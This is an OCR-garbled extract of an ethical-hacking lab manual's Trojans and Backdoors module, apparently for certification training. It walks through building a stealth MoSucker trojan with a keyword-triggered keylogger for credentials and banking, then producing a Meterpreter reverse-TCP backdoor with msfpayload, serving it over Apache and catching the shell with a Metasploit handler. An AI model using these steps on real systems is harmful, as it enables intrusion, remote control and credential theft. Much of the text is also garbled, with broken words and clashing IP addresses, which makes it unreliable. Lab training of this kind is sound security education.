D:\CEH- ■ Attacking a network using sample Trojans and documenting all
Tools\CEHv 8 vulnerabilities and flaws detected
Module 06 Trojans
and Backdoors Lab Environment
To carry tins out, you need:
■ M oSucker tool located at D:\CEH-T00 ls\CEHv 8 M odule 06 Trojans and
B ackdoors\T rojans Types\GUI T rojans\M oSucker
‫י‬ A computer running Windows Server 2012 as host machine
C E H L ab M an u al P age 506 E tliical H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

■ A computer running Window Server 8 Virtual Machine (Attacker)

■ W indows Server 2 008 running 111 Virtual Machine (Victim)

■ Administrative privileges to mil tools
Lab Duration
Time: 20 Minutes

A Trojan is a program diat contains m a licio u s or harmful code inside apparendy
harmless programming or data 111 such a way that it can g e t con trol and cause
damage, such as ruining die file allocation table on a hard drive.
Note: The versions of die created client or host and appearance o f die website may
differ from what it is in die lab, but die actual process of creating die server and die
Lab Tasks
3 t a s k 11. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06
_ Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.
Create Server
with ProRat2. Double-click die C reateServer.exe file to create a server.
F - p i ‫־‬ ‫׳‬ A pp licator Tools M oSucker
| Home Sh View M anage ‫ש‬ ©
Trcjans T ypes ► GUI Trojans ► MoSuckcr V | <‫ | | צ‬Scorch M oSuckcr fi |

* _ “
-<‫ ׳‬Favorites J ! AY Firewall e /e n ts
■ Desktop J tcg i
f t D ow nloads Jl. pi j g ns
'2Al Recent place} j . runtim K
screen shots
04 Libraries J i slons
Q D ocu m ents j . stub
^ Music | ^C fea? eServer.exe |
M Pictures M jSjcL cr exe
Q j Vid»oc j_] R eadM e.txt
lO iterrc 1 it*m cel»rt#d 456 K2
FIGURE 10.1: Install createServer.exe
3. 111 the Open File - Security Warning dialog box, click Run.

Th e p u b lish e r c o u ld n o t b e v e rifie d . A r e you s u re you w a n t to run this

so ftw a re ?
Nam e: ...Trojans Types\GUI Trojans\M oSucker\CreateServer.exe

S3 P u b lish e r U n k n o w n P u b lish e r
Type: A p p lic a tio n
From: Z:\C EH v8 M o d u le 06 Trojans and BackdoorsVTrojans T...
Run Cancel
This file does not have a v alid d igital signature tha t verifies its
publisher. Y o u should o n ly run software fro m publishers y o u trust.
£ / Tools 4. The MoSncker Server Creator/Editor window appears, leave die default
dem onstrated in settings and click OK.
th is lab are
available in MoSucker 3.0
D:\CEH- S erver C reato r/E d itor
Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty
Tools\CEHv 8 Compiled for Public release B on November 20/2002, VB6
m
Module 06 Trojans
(• I want to create a stealth trojan server for a victim
and B ackdoors
I- Indude Msvbvm60.dll in your MoSucker server (adds 750 KB) CD
17 Indude mswinsock.ocx in your server (adds 50 KB) Recommended! CD
17 Pack for minimal file size CD
MoSudcer Transport Cipher Key
TWQPQJL25873IVFCSJQK13761 ‫ש‬
V Add | 2385 KB to the server. ‫ש‬
( I want to create a visible server for local testing.
I want to edit an existing server
17 Start configuration after creating the server
About Cancel Ok
5. Use die file name server.exe and to save it 111 die same directory, click
Save.

& MoSucker Server C re a to r.
© 0 ^ [ « GUI T rojans ► M oSucker Search M oSucker
O rgan ize w N e w fold e r
0 D o c u m e n ts * N am e D ate m o d ifie d T yp e
J 1 M u sic
i . AV Firewall e v e n ts 9 /1 9 /2 0 1 2 1:37 PM File f o ld e i
P ictu res
8 V id e os
Xcgi 9 /1 9 /2 0 1 2 1 : 3 7 PM File f o ld e i
J p lu g in s 9 /1 9 /2 0 1 2 1:37 PM File f o ld e i
X r u n tim e s 9 /1 9 /2 0 1 2 1 : 3 7 PM File f o ld e i
H om egroup
J . s c r e e n sh o ts 1 0 /1 /2 0 1 2 6:56 PM File f o ld e i
X - sk in s 9 /1 9 /2 0 1 2 1:37 PM File f o ld e i
: ■ C o m p u te r
J stu b 1 0 /1 /2 0 1 2 6:50 PM File f o ld e i
^ L ocal D isk ( C )
J p C reateServer.exe 1 1 /2 8 /2 0 0 2 2:59 AM A p p licatia
V C E H -T ools ( \\1 0 .
j g | M 0 Su ck er.exe 1 1 /2 2 /2 0 0 2 5:10 PM A pp licatifl
^ N etw ork
File Q am eJ 5
Save as t y p e E xecu tab le F iles (*.exe)
“■ H id e Folders Save C an c el
FIGURE 10.4: Save Server.exe
6. MoSucker will generate a server with the complete settings in die default
directory.
MoSucker 3.0
G e n e r a t i n g s e r v e r ...
100% complete
Build Date: 11/28/2002 2:04:12 AM

Build Info: MoSucker 3.0 Public Release B
L e v e l A c c e s s e d : Public UPX
Verifying necessary filepaths
Preparing first stub
Preparing second stub
Packing first stub
Packing second stub
Modifying file headers
FIGURE 10.5: Install server progress
7. Click OK 111 die Edit Server pop-up message.
Edit Server 3.0
S e rv e r c re a te d s u c c e s s fu lly !
S e rv e r size: 1 5 8 KB.
D o n o t re p a c k s e rv e r.
OK
FIGURE 10.6: Server created successful
111 the MoSucker wizard, change die VictinVs Nam e to Victim or leave all
the settings as dieir defaults.

MoSucker 3.0
Selected Server: |2:VCEHv8 Modde 06 Trojans and Backdoors\Trojans Type [ Close
NameA’ort
Password
Server ID: 1501704QWEYJC: 4264200TPGNDEVC 0
Cypher Key: TWQPCUL25873IVFCSJQK13761 ‫ש‬
[ Notification 1 Victim's Name: |vict!m ~] ‫ש‬
f Notification 2
0
Server Name(s): kernel32,mscOnfig,winexec32,netconfig‫״‬
Options
Extension(s): exe,pif,bat,dliope,com,bpq,xtr,txp,
Conrectior-Bort: 142381 ‫ש‬

J<gyjg99g- I * Prevent same server multi-infections (recommended)
‫ש‬
You may select a windows icon to associate
Fake Error
with your custom file extension/s.
File Properties
Read Save
FIGURE 10.7: Give die victim machine details
9. Now click K eylogger 111 die left pane, and check die Enable off-line
keylogger opdon, and dien click Save.
10. Leave die rest of die settings as dieir defaults.

MoSucker 3.0
Selected Server: |z:\CEHv8Module 06 Trojans and Backdoors \Trojans Type [ C~\ Close
Name/Port
P I !Enable off-line keyioggetj [T]
Password
Log Filename:
monitor.kig ‫ש‬
1‫ ־‬Enable Smart Logging
Options
Captwn key words to trigger keylogger (separate each with a comma) ‫ש‬
ho tmad,yahoo',login‫׳‬password,bankfsecurefcheckoutfregister,
Keylogger
Plug-ns ^<11
Fake Error
Fde Properties
Read Save
FIGURE 10.8: Enable the keylogger
11. Click OK 111 die EditServer pop-up message.
MoSucker EditServer 3.0
o Server saved successfully.

Final server size: 158 KB
OK
FIGURE 10.9: Server save file

12. Now switch to Windows Server 2008 Virtual Machine, and navigate to
Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans Types\GUI
Trojans\MoSucker to run die server.exe hie.
3 2 ^ -Jpj*1
Si H I
Pit Edl Vtew ~odi •tep
* Virnt * ©
favorite Links ■»-» - H I- ‫■■־‬°■
i AVFrmsI e\en3
£ Pitres
Ii*co
1• Ml*
| 4. â‫־‬e
v 1•
.1
—* ^viSvcce'.sxe
l__ ^ ^_______________________ I
FIGURE 10.10: click server.exe
13. Double-click server.exe in Windows Server 2008 virtual machine, and click
Run 111 die Open File - Security Warning dialog box.
Open File - Security Warning x 11
The publisher could not be verified. Are you sure you want to
run this software?
Name: .. .s\T 1r ojans Types\GUI TrojansV'loSucker'!server.exe
Publisher: U nknow n P ublisher
Type: Application
From: Z : \CEHv8 Module 06 Trojans and Backdoors\T 1r o ja n ...
Run Cancel
‫ן‬. This file does not have a valid digital signature that verifies its
f! publisher. You should only run software from publishers you trust.
How can I decide what software to run ‫ל‬
FIGURE 10.11: Click on Run
14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8

Module 06 Trojans and BackdoorsVTrojans Types\GUI Trojans\MoSucker
to launch M oSucker.exe.
15. Double-cl1ckMoSucker.exe.

K W ‫־ ״‬ A pplicator took M oSucker
11 1 Ib m c Share View‫׳‬ M anage
]© )‫( * ־‬ t l i i * ‫ י ז ״ ז‬jnj Typca ► GUITrojanj ► MoSucker v C | Scorch MoSuckcr fi |
-{ F a v o rite AY F rewa 1 e /e n ts -J ! 5erver.exe
K Desktop M c9
6 D ow nloads J p ljg ns
ffil Rcccnt p l o t o 1 r u n tim e
£ scretnshocs
^gi Libraries ^ slons
H] D ocu m ents stub
M usic $ C rea:eServer.exe
[KJ Pictures ^M oSu derp e]
!HI Videos j | R ead M e.M
11 item s 1 item selerted 3.08 MB £ 5,
FIGURE 10.12: click on Mosuker.exe
16. 111 tlie Open File —Security Warning dialog box, click Run to launch
MoSucker.
The publisher could not be verified. Are you sure you want to run this
software?
Nam e: ...rs\Trojans Types\GUI Trojans\M oSucker\M oSucker.exe

S3 Publisher: Unknown Publisher
Type: A p p lic a tio n
From: Z:\C EH v8 M o d u le 06 Trojans and Backdoors\Trojans T...
Run Cancel
This file does not have a v alid d igital signature tha t verifies its
publisher. Y o u should o n ly run software fro m publishers y o u trust.
FIGURE 10.13: Run the applicatin
17. Tlie MoSucker main window appears, as shown 111 die following figure.
10.0.012 ][10005
Misc stuff
Infotmation
File related
System
J
Spy related
Fun stuff I
Fun stuff II
Live capture
u iiu u i.m o s u c h c r . t K
* 0G
FIGURE 10.14: Mosucher main window
C E H L ab M a n u al P age 512 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

18. Enter the IP address o f die victim and port number as you noted at die time
of server configuration, and dien click Connect.
19. 111 diis lab, we have noted Windows Server 2008 virtual machine’s IP
address (10.0.0.13) and port number: 4288.
Note: These might differ 111 your classroom labs.
FIGURE 10.15: connect to victim machine
20. Now die C onnect button automatically turns to D iscon n ect after getting
connected widi die victim machine as shown 111 the following screenshot.
version 3.0
FIGURE 10.16: connection established
21. Now click Misc stuff 111 die left pane, which shows different options from
which an attacker can use to perform actions from liis or her system.

'‫׳‬A b o u t _ |
I& Tools
dem onstrated in
th is lab are
available in
D:\CEH-
Tools\CEHv 8
Module 06 Trojans
and B ackdoors
FIGURE 10.17: setting server options
22. You can also access the victim’s machine remotely by clicking Live capture
in the left pane.
23. 111 the Live capture option click Start, which will open the remote desktop
of a victim’s machine.
‫ ׳‬A b o u t' _ ~x]
| 4288 11 Disconnect 11 Options ] s g JI& Q
Misc stuff m ake screen sh o t

Information
File related
Make screenshot
System
Spy related JPEG Quality:
Fun stuff I * 20%
Fun stuff II • 30%
Live capture • 40%
Start • 50%
• 60%
Settings
• 70%
• 80%
O 90%
& oi£
FIGURE 10.18: start capturing
24. The remote desktop connection ot die victim’s machine is shown 111 die
following tigiire.

Rem ote adm inistration m ode
îaijol
sssei sssa&i
RA m ode options
Resi2 e windo-v to 4:3
JPG Quality 1 '▼
Delay in ms | 1000
W Send mouseclicks
W Send pressed keys
Send mousemoves
W Autollpdate pics U
V Fullscreen
FIGURE 10.19: capturing victim machine
25. You can access tiles, modify die files, and so on in diis mode.
Rem10 te adm inistration m ode *
w
r\ *>
RA m ode o ptio ns
Resize window to 4 :3 1
*? ■
1 !
Ij
JPG Quality 190% ▼j
Delay in ms | 1000
W Send mouseclcks ______

^ :Tnt-.aocw
W Send pressed Leys
1“ Send mausemoves
W Autollpdate pics E1K«‫־‬ Cfc■‫־*־‬
Fullscrccp
J & Z Z -----------
Crcre:5FHB
► * *■‫־‬o‫י־יי‬
® 1• M
I,i‫״־‬h ‫־‬ — 1 o;
FIGURE 10.20: capturing victim machine
26. Similarly, you can access die details o f die victim’s machine by clicking die
respective functions.
Lab Analysis
your target’s security posUire and exposure through public and free information.

P L E AS E TALK TO YO U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S

M osu ck er O u tp u t:
Record the screenshots o f the victim’s machine
Questions
1. Evaluate and examine various methods to connect to victims if they are 111
different cities or countries.
□ Yes 0 No

Hack Windows 7 Using Metasploit

Metasp/oit Frame// ork is a toolfor developing and executing exploit code against a
remote target machine.
I CON KEY Lab Scenario

Z^7 Valuable [ Large companies are com mon targets for hackers and attackers o f various kinds
inform ation ______
and it is not uncom m on for these companies to be actively monitoring traffic to
.‫ * ׳י‬T est your and from their critical IT mfrastnicture. Based 011 the functionality o f the
knowledge _______ Trojan we can safely surmise that the intent o f the Trojan is to open a backdoor
e W eb exercise * 011 a compromised computer, allowing a remote attacker to monitor activity and
steal inform ation from the compromised computer. Once installed inside a
Q W orkbook review £ corporate network, the backdoor feamre o f the Trojan can also allow the
attacker to use the initially compromised computer as a springboard to launch
further forays into the rest o f the infrastructure, meaning that the wealth o f
liitormation that may be stolen could potentially be far greater than that existing
011 a single machine. A basic principle with all malicious programs is that they
need user support to do the damage to a computer. That is the reason why
Trojan horses try to deceive users by showing them some other form o f email.
Backdoor programs are used to gam unauthorized access to systems and
backdoor software is used by hackers to gain access to systems so that they can
send 111 the malicious software to that particular system. Successful attacks by
the hacker 01‫ ־‬attacker infecting the target environment with a customized
Trojan horse (backdoor) determines exploitable holes 111 the current security
system.
& Tools
dem onstrated in Lab Objectives
th is lab are
available in The objective o f tins lab is to help students learn to detect Trojan and backdoor
D:\CEH- attacks.
Tools\CEHv 8
The objectives o f the lab include:
Module 06 Trojans
and Backdoors ■ Creating a server and testing the network for attack

■ Attacking a network using sample backdoor and monitor the system

activity
Lab Environment
To cany diis out, you need:
■ A computer running Window Server 2012
‫י‬ BackTrack 5 r3 running in Virtual m achine
■ W indows7 running 111 virtual machine (Victim machine)

■ Administrative privileges to mil tools
Lab Duration
Tune: 20 Minutes

A Trojan is a program that contains m a licio u s or harmful code inside apparendy
harmless programming or data 111 such a way that it can g e t control and cause
damage, such as mining die hie allocation table on a hard drive.
Lab Tasks
sd T A S K 1 1. Start B ackT rack 5 virUial machine.
Create Sever 2. O pen the terminal console by navigating to A pplication ^ B ackT rack
C onnection ‫ ^־־‬E xploitation T ools ‫ ^־־‬N etw ork E xploitation T o o ls ‫ ^־־‬M etasp loit
Fram ework ‫ ^־־‬m sfc o n so le
,y A pp lica tio ns P la c e s S y s te m | d LIUC O ct 2 3 1 0 : 0 3 ‫ ״‬AM
A c c e ss o r ie s ►
^ B ackltd ck : ‫ !*> ׳‬G athering
, f Graphic* V ulnerability A s s e s s m e n t ►
Internet ► ■0 E xp loitation Ib o ls ► . K N etw ork Exploitation Tbols ‫ ! > ־׳‬. C isc o A ttack s ►
i l l Office ►^ P n v ile g e E scalation ‫ ״‬/<§> Exp loitation Tools ► .1 . FasM Vack ►
^ Other ► B\ M aintaining A cc ess » ^ D a ta b a se Expl• ^ arm itage i H M eta sp lo it Fram ework ►
! ^ ‫ ״‬Sound & V ideo ► R ev e rse E n gin een n g » W ir ele ss Explo ^ m sfd i if - . SAP Exploitation »
Open your terminal f l f S y s te m Tools ► ^ RFID T ools ► ^ S ocial E n gm ee ^ m sfc o n s o le ^ isr-evilgrade
(CTRL + ALT + T) and type 5 W ine ► a S tr e ss Testina ‫־״‬ P h ysical E xplo ^ m sfu p d a te n e to ea r -teln e te n a b le
msfvenom -h to view the r f - F ore n sics ► O p en Sou rce E 3b . start m sfpro ter m in e te r
available options for diis tooL ^ R eporting Tools

V
jP S e r v ic e s
? M isce lla n eo u s
* m _ ‫—׳‬ ‫ י‬, ‫כ‬ ‫א‬
<< back track
[C reate S im p le Exp loit...

AH Rights Reserved. Reproduction is Stricdy Prohibited.
FIGURE 11.1: Selecting msfconsole from metasploit Framework

3. Type the following command 111 msfconsole: m sfp ayload
w in d o w s/m eterp reter/rev erse tcp LH O ST=10.0.0.6 X >
D esk to p /B a ck d o o r.ex e and press Enter
N ote: This IP address (10.0.0.6) is BackTrack machines. These IP addresses

may vary in your lab environment.
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection I I
File Action Media Clipboard View Help
« 3 ®S 0 II 1► fe 1
Applications Places system ‫ם‬ Cj !S3 T U e0C t23. 3:32 PM
I File Edit V iew Terminal Help
3K0a SuperHack I I Logon
xracK
» [ m e t a s p lo it v 4 .s .0 - d e v [ c o r c : 4 b a p t: 1 . 0 ] y
- 927 ] = ‫ ״‬e x p l o i t s • 499 a u x i l i a r y - 151 p o s t
- 2 5 1 ] = ‫ ־ ־‬p a y lo a d s • 28 e n c o d e r s - 8 nop s
; > j n s f p a y lo a d w i n d o w s /n e t e r p r e t e r /r e v e r s e t c p L H O S T -1O .0.0.6 X > D e sk to p /B a c k d o o r
FIGURE 11.2: CreatdngBackdoor.exe
4. Tins command will create a W indow s e x e c u ta b le file with name the

M etasploit B a ck d o o r.ex e and it will be saved on the BackTrack 5 desktop.
Framework, a tool ‫ד׳‬----------------------- BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection
for developing and J File Action Media Clipboard V !** Help
executing exploit it 0 ® @g ■ !‫ ן‬it fe

^ Applications Places System U 1ue OCt 23. 11:53 AM
cod e against a
rem ote target A
B a ckd oor.exe
machine
<< back I track

,Vi ja a j
FIGURE 11.3: Created Backdoor.exe file
5. N ow you need to share B a ck d o o r .e x e with your victim machine

(Windows 7), by following these steps:
C E H L ab M a n u al P age 519 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

6. O pen a new B ackT rack 5 terminal (CTRL+ALT+T) and then nan this
command mkdir /var/w w w /sh are and press Enter to create a new
director}‫ ״‬share.
To create new directory

share following command is
usedmkdir / var/www/ share
FIGURE 11.4: sharing the file
7. Change the mode for the share folder to 755, by entering the command
chm od -R 7 5 5 /var/w w w /share/ and then press Enter
T=TB"■
BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection
<910 (■
) @ O II It fe ,
A pp lications P la c es S y s te m □ d FT ■Rie Oct 2 3 . 12:03 Pf/
.ft
Backdoor.exe
•*> ‫׳י‬ ‫ א‬ro o t^ b t: —
File Edit V iew Terminal Help
1-. ra<d1f A /»>*</share
^ o o t$>i ‫ ־‬- k c h a o d •R 7S5 / v a r / * w w / s h a r e / |
‫י‬I
m To change die mode of

share folder use the following
comma11d:chmod -R *
/var/www/ share/
<< back I track £

‫״‬ai
FIGURE 11.5: sharing the file into 755
8. Change the ownership o f that folder into www-data, by entering the

command ch ow n -R w w w -d ata:w w w -d ata /var/w w w /share/ and then
press Enter.

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection

Fil• Action M idi• Clipboard Mw Hilp
It > ® @0 II It >»
Applications Places system ( * ] d I RJCoct 23.12:0‫ צ‬PM
' v k ro o t^ b t: ‫־־‬
ile Edit V iew Terminal Help
‫׳‬otgfet:‫ *־‬nkdir /var/www/share
-2 i . l l L . ‫ ■־‬T T ; i
■ .
■ o t'jb t:-♦ cnown •R ^ > d a ra :v.w data /y a r/w //s ftr> rc / \
To ch a n g e
ow nership of
folder into w w w ,
u se this com m and
chow n -R w w w -
< < back I track 5
data
/var/www/share/
FIGURE 11.6: Change the ownership of the folder
9. Type the command Is -la /var/w w w / | grep sh a re and then press Enter
BackTrack on W1N-D39MR5HL9E4 - Virtual M ach ine C onn ection '-!°‫*־׳‬
U 3 ® S> 0 II I t ffe
Applications Places system (>‫ך‬ d [>-<: 1ueOCt23.1
‫׳‬s v x r o o t^ b t -
Tile Edit V iew Terminal Help
ro o t^ b t:-* n k d ir / v a r / w w / s h a r e
ro o tg b t:-# chaod -R 755 /v a r / w v w /s h a r e /
'c -~ chow r -R w » d a t a : w u w d a t a / y a r / w w / s t m r e /
r o c t^ b t:-» I s - I d /v a r A * * t / | g r e p s h a r e |
<< back I track 5

-0 3
FIGURE 11.7: sharing die Backdoor.exe file
10. The next step is to start the A p ach e ser v er by typing the se r v ic e
a p a c h e 2 start command 111 the terminal, and then press Enter.


Fil• Action M idi• CI1pbo»rd V !** Htfp
It > ® @0 II 1►>»
Applications Places system (‫] י‬ a I 1UC CCt 23. 12:07 PM
‫י׳‬ ‫׳י‬ ‫ א‬r a o t^ b t: —

File Edit V iew TSfrminal Help
ro o tja b t:‫ ־‬# n k d ir /var/www/share
ro o tja b t:-* ch«od -R 755 /v a r/w w /s h a re /
r o o tg b t:'♦ chowr ■R v m data:www data /var/wwv/shar<
ro o tg b t:-♦ I s - la /v a r /w w / | grep share
d rw x r-x r-x 2 www-data w w -d a ta 4096 2012-10-23 12 ■A
-pet : c l : - ♦ s e rv ic e apache2 s t a r t |
* S ta rtin g web server apache2
h ttp d (p id 3662) a lre a d y running
‫י‬
A
<< back I track £

-0 3 .
& T o run the FIGURE 11.8: Starting Apache W ebserver
a p a ch e w eb server 11. N ow your Apache web server is running, copy the B a ck d o o r .e x e file
u se th e following
into the share folder. Type the following command cp
command:
/root/D esk top /B ack d oor.exe /var/w w w /share/ and press Enter
cp
/root/.m sf4/data/ex ‫ד« ח״ן־ן‬
BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection
ploits /* « I©®©a 11 !»■r» ,
/var/www/share/
A
B a ckd oor.exe
‫־״־‬ v‫׳‬ x r o o t 'J b t : ~
R le Edit V iew Terminal Help
ro o ts to t:-# n k d ir /v a r/w w /s h a re
root 0 b t : - 4 1 chaod -R 755 /v a r/w w /s h a r e /
r o o t g b t : '• chown r m/m data:wvw data /v a r/w w v r/s h a r• /- .^
ro o tp b t:* # I s - la /w a r/m m / | grep share
d r w x r - x r x 2 v/^v data ww#r data 4096 2612 JQ -2 1 n ! n 1 utm
r o o t0 b t:* f s e rv ic e apache2 s ta r t
• S ta rtin g web server apache2
h ttp d (p id 3662) a lre a d y running
r o o tflb t:- * c p /r o o t / D e s k t o p /B a c k d o o r .e x e /v a r /w w w /s h a r e /
L i J i : a i i : 111:1 l ..a, tiu - u l : . I i 11: ll 11111:1.
‫י‬ c p /r o o t/ O e v k t Q p / B d c k d o o f .e x e /v a r / w w w / s h a i e /
<< back I track

‫יו‬
1 Status: Running
FIGURE 11.9: Running Apache Webserver
12. N ow go to W indow s 7 Virtual Machine, open Firetox or any web

browser, and type the URL http://1 0 . 0 . 0 . 6/s h a r e / 111 the URL field and
then press Enter
N ote: Here 10.0.0.6 is the IP address o f BackTrack; it may vary 111 your
lab environment.

W in dow s 7 o n W1N-D39MR5HL9E4 - Virtual M a r in e C onnection ‫י‬

Fil• Action Media Clipboard V !** Halp
‫ »׳‬0 )‫ !> (יי‬Q n 1►;fe 0

Indtx of/th an ’ = ' ‫■׳־‬te
aha'c'10.0.0.6 C *11‫ ־‬GopfJe - ‫׳‬° *
l£ 1 MottVniUd G«ttin9 $U11*d i..i Su99«a«d SiUt W«t> SUaG^lcfy D B»knw I
Index o f/s h a re
N am e L a s t m od ifie d S u e D e scrip tio n
P aren t Directory
23-0ct-2012 12:12 72K
Apache/2.2.14 (U b tm ru ) Server at 1 0 0 .0 .6 P o rt SO
,W^cwM'WUY... BackTratj^^VI■^J W
indowô^fl,
FIGURE 11.10: Firefox web browser with Backdoor.exe
13. Download and save the B a ck d o o r .e x e tile in Windows 7 Virtual

Machine, and save tins file on the desktop.
HZ ‫י‬
If you didn't Action Media Clipboard View‫׳‬ Help
have a p a ch e 2 10 ®@0 II 1►ife5

installed, run apt-
g e t install a p a ch e 2
C EH
Certified Ethical Hacker
•Unnujl*
FIGURE 11.11: Saved Backdoor.exe on desktop
14. Switch back to the B ackT rack m achine.

15. O pen the M etasp loit console. To create a handler to handle the
connection Irom victim macliine (Windows 7), type the command u se
exp loit/m ulti/handler and press Enter


m The exploit will be saved Fil• Action M idi• CI!pbo»rd V !** Htfp
on It > ® @ 0 II It >»
Applications Placcs system A I 1UC OCt 23. 12:30 PM ,
/ root/.msf4/data/exploits/
folder
‫י׳‬ v x !te rm in a l
Bnckdoor.e f ' 1* Edlt V1ew Terminal Help
! ( .‫־‬
•‫*״‬/
n sf > nsfpayload w1 ndows/‫ »׳‬e te rp re te r/reverse tc p LHOSW97T1m7b.91 X ^tofefetop/B ackdoor.exe

[ * ] exec: nsfpayload w in d o w s /re te rp re te r/re v e rs e tc p LHOST-192. I$a-e0?9ix > C ^ g w ^ ^ j d o o r
Created by nsfpayload ( h ttp ://M M .n e ta s p lo lt.c o n ) .

Payload: windows/mete rp re te r/re v e rs e tc p
Length: 290 %
O ptions: ("LHOST192.168 .8 . 91 ■<:=*‫>"־‬
wsf > use e x p lo it/n u lti/h a n d le r |
n sf e x p lo it (h a n d le r) >
<< back I track ^
FIGURE 11.12: Exploit the victim machine
16. To use the reverse TCP, type the command s e t payload

w in d ow s/m eterp reter/reverse_tcp and press Enter
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection •‫ןז« ׳״׳‬
< 0 10 ® e e 11 i t ‫ ן‬h *>
Applications Places system £j [>y, 1ue OCt 23. 12:36 PM ,
B ackd o o r.J Fl|e Edit V iew Terminal Help
U=U To set reverse TCP vise

the following command set
payload
I
msf > tisfpayload w in d o w s/n e te rp re te r/re ve rse tc p LHOST192.168.8.91‫־‬ !esktop/Backdoor.exe
windows/meterpreter/reverse [*1 exec: nsfpayload w ln d o w s /re te rp re te r/re v e rs e tcp LH0ST=192.J68.8 ^ *jp e s k top / Ba c kd 0 0 r i l
- tcP
C r e a te d b y n s f p a y lo a d ( h t t p : / / M M . n e t a s p l o i t . c o n ) .
Payload: w in dow s/m eterpreter/reverse tc p f
Length: 290 :f/
Opt io n s : { ‫־־‬LHOST"->" 192.168 8 .91‫> ״‬
BSl > use e x o lo lt/B u lT l/h a n d le r ^
nsf e x p l o i t ( h a n d l v r ) > l s e t p a y lo a d w i n d o w i / n e t e r p r e t e r / r e v e i s e t c p l
p ay I o n d - > w in d o w s /m e te r p m v r 7 T P V P r C T ‫־־‬r r p 1
flfcf e x p l o i t ( h a n d l e r ) >
<< back I track 5
FIGURE 11.13: Setup die reverse TCP
17. To set the local IP address that will catch the reverse connection, type
the command s e t Ihost 1 0 .0 .0 .6 (B ackT rack IP A d d ress) and press
E nter

BackTrack 0 ‫ ח‬W1N-D39MR5HL9C4 - Virtual M ach ine C onn ection

Fil• Action M id i* Clipboard V i** H*lp
• it 9 (•) © 0 Ml * •
Applications Placcs system ( * J d I HJC o c t 23. 12:40 PM
1/5 rI A v * Tfcrroinal
B n ck door.J ‫ «י'יז‬Edit View Terminal Help
! n i l > i s f p a y l o a d w in d 01 r f s / » e t e r p r e t e r / r e v e r s e _ t c p 1 H 0 S T -1 9 2 .1 6 8 .8 .9 1 X > D e s k t o p /B a c K d o o r .e x e
I [ ♦ ] e x e c : m s f p a y lo a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p L H Q ST -192.1 6 8 . 8 . 9 1 X > D e s k t o p /B a c k d o o r .!
Created by rasfpayload ( h ttp ://w w x .n e ta s p lo it.c o n ) . . — - ""

P a y lo a d : w i n d o v s / m e t e r p r e t e r / r e v e r s e _ t c p
L e n g t h : 298
o p t i o n s : {"LH 05T“= > " 1 9 2 . 1 6 8 .8 .9 1 * }
m sf > u s e e x p l o . i t / 1 1 u l t i / h a n d l e r
msf e x p lo it ( handler) > se t payload w m dow s/neterpreter/reverse Tcp
payload => windows/neTerp re T e r/re ye rse tco
msf e x p lo it (handler) > |set Ih o s t 1 8 . 6 . 5 . 6 |
IhosT => 1 0 . 6 . 0 . 6
e x p lo it ( handler) >__________________________________________________
<< back I track

58a.
FIGURE 11.14: set the lost local IP address
18. To start the handler, type the command ex p lo it -j - z and press Enter
BackTrack o n W1N-D39MR5HL9L4 - Virtual M ach ine C onn ection I I 1
« ) ® @<a 11 1>• ^ j
Applications Places system [>^j TUe OCt 2 3 .1 2:4 4 PM
^
■/4 t I ‫י«׳!י״'<יו< “ י־‬
B ackd oor.d File Edit V iew Terminal Help
C r e a te d b y n s f p a y l o a d ( h t t p : / / w w . n e t a s p l o i t . c o n ) .
P a y l o a d : w in d o w s /m e te rp r e t e r / r e v e r s e t c p
L e n g t h : 290
O p t i o n s : { ‫־‬, IHOST■‘= > • '1 9 2 .1 6 8 .8 .9 1 ‫} ״‬
m sf > u s e e x p l o i t / n u l t i / h a n d l e r
m sf e x p l o i t ( h a n d l e r ) > s e t p a y l o a d w i n d o w s / n e t e r p r e t
p a y lo a d => w i n d o w s / r i e t e r p r e t e r / r e v e r s e t c p
m sf e x p l o i t ( h a n d l e r ) > s e t I h o s t 1 8 . 6 . 8 . 6
Ih o st -> 1 0 .0 .0 .6 j
m sf e x p l o i t ( h a n d l e r ) > ! e x p l o i t - j - 1 1
I * ] E x p l o i t r u n n in g a s b a c k g r o u n d jo b
[ - I S t a r t e d r e v e r s e h a n d le r on 1 8 .0 .8 .6 :4 4 4 4
I ‫״־‬I S t a r t i n g t h e p a y lo a d h a n d l e r . . .
m sf e x p l o i t ( h a n d l e r ) > I
<< back I track 5
FIGURE 11.15: Exploit the windows 7 machine
19. N ow switch to the victim m a ch in e (Windows 7) and double-click the

B a ck d o o r.ex e file to run it (which is already downloaded)
20. Again switch to the BackTrack machine and you can see the following
figure.

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection !- , “ ‫י * י‬

Filt Action M#di* CI1pbo»rd V i•* Htfp
•it S (•) @ O II 1► * »
Applications Places system d M : TUcoct23. 3:02 pm ,
^ a v x ‫!־‬term in al
/ File Edit V iew Terminal H elp
Back( ♦ " *‫ “־‬I 927 e x p l o i t s • 499 a u x i l i a r y • 151 p o s t
«■ 251 ]■ -- •‫ ־‬p a y lo a d s 28 e n c o d e rs 8 nops
1 s t > m sfpayload w in d o w s /iie te r p r e te r /r e v e r s e t c p LHOST-10.0.0 6 X > D esktop B ackdoor.exe

[* ] ex ec : n sfp a y lo a d w in d o ir f s /m e te r p r e te r /r e v e r s e tc p LHOST=10.0.0.6 X > D esktop B ackdoor.exe
sh : D esktop: i s a d ir e c to r y
msf > m sfpayload w i n d o w s /n e te r p r e te r /r e v e r s e tc p LH0ST=18. 0 .0 . 6 X > D esk to p /B ack d o o r.ex e
l ‫ ״‬J ex ec : n sfp a y lo a d w in d o irfs/m e te rp re te r/re v e rse tc p LHOÎ‫ ־‬lft.ft.-O ^TX 0 ‫־*י‬e^1tt’6J»/Back d o o r.e x e
